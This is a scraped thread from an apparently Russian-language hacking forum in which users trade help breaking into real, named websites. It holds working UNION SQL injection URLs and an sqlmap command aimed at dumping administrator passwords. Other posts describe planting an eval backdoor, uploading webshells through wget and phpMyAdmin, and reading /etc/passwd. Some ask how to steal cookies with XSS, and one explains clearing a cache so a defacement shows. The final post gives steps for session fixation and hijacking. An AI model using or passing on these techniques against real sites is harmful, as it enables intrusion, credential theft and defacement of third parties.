такая кавычка не режется, print(`ls -la`) сработало...но теперь похоже режутся слэши...ни ls ../,ни ls ..\ не срабатывает...соотв-но,залиться тоже не получается... есть ещё варианты?
help Парни, хелп! Code: _ttp://www.infotopcar.com/index.php?option=com_parcoauto&action=scheda&idVeicolo=-3473%20UNION%20ALL%20SELECT%200,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,CONCAT%280x7e,version%28%29,0x7e%29,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--%20&tipo=auto Не получается продвинуть далее.
Code: www.infotopcar.com/index.php?option=com_parcoauto&action=scheda&idVeicolo=-3473 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,table_name,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85, 86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156+from+information_schema.tables+where+table_schema=0x706f7274616c636c7562+limit+0,1--+-&tipo=auto
Есть булковский форум, прописал в faq_complite eval($_GET[e]);. Вроде бы все хорошо, пхп инфо выводиться, но вот только: Code: allow_url_include Off allow_url_fopen Off Интересует, как заливаться в данной непростой ситуации? До этого пробывал вгетом лить в tmp, вроде бы все залилось, только вот site.com/tmp/shell.php не открывается, и выдает 404 ошибку. И да, на всех папках стоят права nobody(мб это как-то влияет?). Заранее спасибо
Привет всем! Помогите пожалуйста разобраться с XSS-уязвимостями. Не совсем понятно, как использовать их, чтобы к примеру получить чужие cookies, а не свои. Что делать с такого вида уязвимостями? Code: URL encoded POST input poll%5Btitle%5D was set to '"()&%1<ScRiPt >prompt(911011)</ScRiPt> или Code: URL encoded POST input character%5bdescription%5d was set to 1<div style=width:expression(prompt(928982))> The input is reflected inside a text element. Также интересует уязвимости типа "HTML form without CSRF protection" можно использовать для подмены данных или не только?
Сообственно впервые столкнулся с такой проблемой) Вообщем через скуль добыл пасс от рута мускула , на сайте есть phpmyadmin Сообственно пытался залить шелл через пхпмуадмин и столкнулся с такой проблемой а именно с определение пути к сайту например мой сайт называется sqlinject.com sqlinject.com/news.php?id=1' Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/vhost/sql.com/news.php on line 63 так же в корне присувствует файл phpinfo в котором путь так же прописан таким образом /var/www/vhost/sql.com/phpinfo.php Решил посмотреть сайты на одном ип в итоге получил список из 50+ сайтов... попробовал просканить эти сайты на директории и файлы оказалось что в каждом сайте присувствуют такие файлы config.php, connect.php, phpinfo.php и еще куча файлов. вообщем файлы одни и теже на каждом сайте... это я клоню к тому что файлы эти посути лежат в одной директории, но контент на сайтах разный совершенно... в файле phpinfo.php на каждом сайте один и тот же путь) "/var/www/vhost/sql.com/phpinfo.php" Пробовал прочитать файл через LOAD_FILE например phpinfo с пути написанного выше) не читает... хотя /etc/passwd читает) Чисто для читалки попробовал залить минишелл через пхпмуадмин в /tmp/ Шелл залился и прочитался через LOAD_FILE Сообственно интересует вопрос возможно ли как-то получить настоящий путь к сайту sqlinject.com, что бы залится) Мб есть у кого какие нить соображения по этому поводу?) Есть папочка icons от апача) но она походу не доступна для записи) да и путь искать надо) Если есть у кого желание помочь и поломать голову)) могу предоставить root;pass к phpmyadmin ))
http://bkwar.ru/news/?topic=494 Протестил через Хавиж (ну первонюбские примычки) Скюля методом стринг. Хавиж выводит Бд всё нормально таблицы и так далее... Ихнее http://bkwar.ru/www/labirint3/ulldie.php Пхпинфо ИСП мэнэджер тут https://bkwar.ru:1500/ Ещё БД тут http://bkwar.ru/pgadmin/ Открытые порты сканеные через нмап : 110 , 143, 1500 , 21 ,22 , 443 , 4444 ,5000 ,53 , 993 ,995 ну и соотвественно 80. Что нашёл webshag Напишу более подозрительные /robots.txt found. It might be interesting to have a look inside. /bin/ Directory indexing is enabled: CGI directory /bin/ This might be interesting... possibly a system shell found. /webmail/src/read_body.php This might be interesting... has been seen in web logs from an unknown scanner. Ну есть ещё уйма директорий ... А да сканер Дирбустер показал это : http://bkwar.ru/myadmin/setup/index.php Пробовал разные варианты прочитанные и не прочитанные. А у них отключенно выползание ерророк (тут и ступор). Недельки две мучаюсь. может подскажите как как всё это преодолеть и вынести результат в браузер. Прошу прощение если не туда всунул вопрос. Ещё не освоился у вас...
нужно вывести username,password при помощи sqlmap, где usertype=Administrator http://blindcanadians.ca/press_releases/index.php?BriefID=50+union+select+concat_ws(0x3a,username,password)+from+users+where+usertype='Administratot'+--+ так дампится вся база, как сделать так, чтобы выводился только Administrator? sqlmap -u "http://blindcanadians.ca/press_releases/index.php?BriefID=50" --dump -T users -v 1
я тут с такой поблемой столкнулся, залил на сайт шелл, отредактировал морду, открываю сам сайт, изменений ноль, смотр на Server IP: там написано 127.0.0.1 что ет за фигня такая?
та это тут не причём, индекс действительно не изменился, вот если удалить файл то да, напишет ошибку, а от изменений ноль толку
И чего удивительного? Наверняка какой нибудь APC cache или что-то из этой оперы стоит. При изменении кеш просто не успевает обновиться, а при удалении файловый идентификатор из ФС исчезает и в opcode кешер вносится соответствующая информация. Посмотри что используется в phpinfo и если тот же APC то у него есть менеджер одним файлом в котором удобно обнулять кеш. По поводу IP учите матбазу господа. В стандартной связке nginx+apache, к примеру, фронтэнд вешается на внешний интерфейс имеющий уникальный IP, в то время как бэкэнд вешается на локальный те localhost он же 127.0.0.1. А так как php выполняется на уровне бэкэнда будь то mod_php или cgi, то и переменная окружения которая выводится в serverIP имеет оный localhost
чего ты так рагорячился)) мы же не такие про как ты)) глянул пхп инфо, есть там apc, как там обнулить кеш?
погугли - apc.php manager по самому первому линку там можно скачать скрипт. Очень просто настраивается. В правом верхнем углу кнопка - clear opcode cache. Меняешь php файл. Обнуляешь кеш, заново инициируешь запуск файла в который были внесены изменения. Стоит отметить, что далее в frontend-backend данные от бэкенда попадают в тот же файловый кеш нгинкса или мемкеш. Так что если все равно не обновится значит копать в эту сторону.
Возможный путь использования XSS: PHP: - Нахождение XSS - Впаривание XSS - Получение PHPSESSID - Заход под PHPSESSID PHPSESSID session fixation: PHP: - Создание своего уже-известного PHPSESSID - Установка этого PHPSESSID у удаленого человека(Впаривание) - Он авторизуется по этим PHPSESSID - Мы заходим под уже известным PHPSESSID Может использоваться как альтернатива кражи куков в некоторых случаях, при впаривани методом соц. инженерии, при отправке скомпрометированного ответа сервером. Установка PHPSESSID может быть в параметрах методом GET, а не только через куки. http://www.acros.si/papers/session_fixation.pdf